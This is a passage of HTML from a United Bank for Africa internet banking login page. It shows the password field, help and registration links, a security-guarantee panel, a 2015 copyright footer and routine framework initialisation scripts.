	<span  id="HDisplay1.Rb6.C1"  class="hwloginpagelabel">
	<label for="ACCESS_CODE" class = "simpletext" >Password<span class="redstar">*</span></label>
    </span>
    </p>

    <p  id="HDisplay1.Rb7"class="loginrow" >
	<span  id="HDisplay1.Rb7.C1"  class="hwleftimagevirtualkeyboard"><span class="labelColumn">
    <input type="password" name="password" size="28" class="querytextboxmedium" id="password" maxLength = "128"/>
    </span>
    <span class="simpletext">&nbsp;</span></span></p>

          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C2" ><span class="simpletext" id="Caption24638155">Your password is case sensitive - Check your CAPS LOCK</span></span></p>

          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C1" ><span class="simpletext">&nbsp;</span></span></p>
			

          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C1" ><span class="simpletext">&nbsp;</span></span></p>

          <p  id="HDisplay1.Rb14"class="loginrow" >
<span  id="HDisplay1.Rb14.C1"  class="hwleftimagevirtualkeyboard"><span class="login_HW_formbtn"><input  type="Submit" name="submit" class="loginpage_formbtn" id="submit" value="Log In" title = "Log In"/></span><span class="simpletext">&nbsp;&nbsp;&nbsp;</span></span></p>

          <p  id="HDisplay1.Rb5"class="loginrow" >
<span  id="HDisplay1.Rb5.C1" ><span class="simpletext">&nbsp;</span></span></p>
  
          <p  id="HDisplay1.Rb13"class="loginrow" >
<span  id="HDisplay1.Rb13.C1"  class="hwloginpagelabel">
<span class="simpletext" id="span_label_forgot_access_code">
<a  href="#" title = "Forgot Password?" class = "bluelink">Forgot Password?</a>
</span>
</span>
<span  id="HDisplay1.Rb13.C2" >
<span class="simpletext" id="span_Caption24477412">
<a  href="#" title = "Forgot User ID" id="Caption24477412" name = "HREF_Caption24477412"  class = "bluelink" target = "_blank">Forgot User Id?</a>
</span>
</span>
</p>

            
          <p  id="HDisplay1.Rb20"class="loginrow" >
<span  id="HDisplay1.Rb20.C1" ><span class="simpletext">&nbsp;</span></span></p>

            
          <p  id="HDisplay1.Rb21"class="loginrow" >
<span  id="HDisplay1.Rb21.C1" ><span class="simpletext" id="span_Caption24477412"title = "Quick Guide" >
<a  href="#" class = "bluelink_bold font_terms_redim m_colorBlack" >Quick Guide</a>
</span>
</span>
<span  id=""><span class="rightTextBlackBold" id="divider3">&nbsp;</span></span></p>

          <p  id="HDisplay1.Rb24"class="loginrow" >
<span  id="HDisplay1.Rb24.C1" ><span class="simpletext" id="span_Caption24477412"title = "Need Help? Click for Live Chat" >
<a  href="#" class = "bluelink_bold font_terms_redim m_colorBlack" >Need Help? Click for Live Chat</a></span></span></p>

          <p  id="HDisplay1.Rb24"class="loginrow" >
<span  id="HDisplay1.Rb24.C1" ><span class="simpletext" id="span_Caption24477412"title = "Social Link" >
<a  href="#"  class = "bluelink_bold font_terms_redim m_colorBlack" >Click for U-Social (Social Banking)  </a></span></span></p>


            <p  id="HDisplay1.Rb26"class="loginrow" >
<span  id="HDisplay1.Rb26.C1"  class="regBtn"><span class="simpletext" id="span_Caption24477412211"title = "Register for Internet Banking" ><a  href="secure_register.html">Instant Self-Registration</a></span></span></p>

			
        </div>

        <div  class="width50percent_right" id="HDisplay1.Rowset3">
   
          <p  id="HDisplay1.Rc1"class="loginrow" >
<span  id="HDisplay1.Rc1.C1" ><span class="textwithlargerfont" id="notRegisteredYet"title = "Not registered Yet ?" >Not registered Yet ?</span></span></p>

          <p  id="HDisplay1.Rc2"class="loginrow" >
<span  id="HDisplay1.Rc2.C1" ><span class="simpletext">&nbsp;</span></span></p>

          <p  id="HDisplay1.Rc3"class="loginrow" >
<span  id="HDisplay1.Rc3.C1" ><span class="simpletext" id="SafeSecureAvailable"title = "Safe -Secure -Available" >Safe -Secure -Available 24/7 -Internet Banking Guarantee -Easy to use -Pay Bills -Transfer money to friends -Online statements -Foreign Exchange -Direct Debits -Order cheques-24/7 support</span></span></p>

          <p  id="HDisplay1.Rc4"class="loginrow" >
<span  id="HDisplay1.Rc4.C1" ><span class="simpletext">&nbsp;</span></span></p>

     
          <p  id="HDisplay1.Rc5"class="loginrow" >
<span  id="HDisplay1.Rc5.C1" ><span class="HW_formbtn_grey"><input  type="Submit" name="Action.Register_Now" class="formbtn" id="registerNowButton" value="Register Now" title = "Register Now" disabled="disabled"/></span><span class="HW_formbtn_grey"><input  type="Submit" name="Action.Trial_Demo" class="formbtn" id="TrialDemoButton" value="Trial Demo" title = "Trial Demo" disabled="disabled"/></span></span></p>

        
          <p  id="HDisplay1.Rc6"class="loginrow" >
<span  id="HDisplay1.Rc6.C1" ><span class="simpletext">&nbsp;</span></span></p>

          <p  id="HDisplay1.Rc7"class="loginrow" >
<span  id="HDisplay1.Rc7.C1" ><span class="textwithlargerfont" id="SecurityGuarantee"title = "100% Security Guarantee" >100% Security Guarantee</span></span></p>

          <p  id="HDisplay1.Rc8"class="loginrow" >
<span  id="HDisplay1.Rc8.C1" ><span class="simpletext">&nbsp;</span></span></p>

       
          <p  id="HDisplay1.Rc12"class="loginrow" >
<span  id="HDisplay1.Rc12.C1" ><img src="images/verisign.jpg?mtime=1422020290000" alt="Verisign" title="Verisign" class="verisignimage" id="Verisign_Logo"border="0" /></span></p>

          <p  id="HDisplay1.Rc13"class="loginrow" >
<span  id="HDisplay1.Rc13.C1" ><span class="simpletext" id="securityGuarenteeFollowingText"title = "SecurityGuarenteeText" >True 128-bit Extended Validation SSL CertificatesThe most trusted and secure choice for Web site security helps attract more customers to your site and gives them the confidence to complete their transactions, while enabling the strongest SSL.</span></span></p>

        </div>

  </div>

  <div  class="section" id="Footertext" >
            <div  class="center" id="Footertext.Rowset1">
          
            
          <p  id="Footertext.Ra1"class="formrow" >
<span  id="Footertext.Ra1.C1"  class="footer_lg"><span class="simpletext" id="dispFooter">&copy; 2015 United Bank for Africa Plc. All Rights Reserved.<br><br></span></span></p>

        </div>

  </div>

<script type="text/javascript">feba.js.common.checkJS("JS_ENABLED_FLAG");</script><NOSCRIPT><BR><CENTER><B>
Your browser is not Javascript enabled. Please enable Javascript for enhanced security.
</B></CENTER></NOSCRIPT>


<script type="text/javascript">jsVarForControlIds="AuthenticationFG.ACCESS_CODE=Password@@AuthenticationFG.USER_PRINCIPAL=UserID@@"</script><script type="text/javascript">jQuery(function(){RedrawAllTrees();jsonObj={"TypesCatalogue":{"UserPrincipal" : {"LEN":"65",
"JUS":"LEFT_JUSTIFIED",
"CST":"MIXED_CASE",
"CNT":"null",
"SEC":"false",
"BCC":"false",
"PTY": "STR"
}}};init(jsonObj,null,jsVarForControlIds);
feba.js.common.blockOnButtonClicks("loadingImage");
feba.js.common.blockOnHyperlinkClicks("loadingImage");
feba.js.common.runPageCustomFunction("AuthenticationScreen_onload","null");feba.js.common.runModuleCustomFunction("user_onload","null");});</script><img src="images/widget-loading.gif" id="loadingImage" style="display:none;"/></form></body></html>

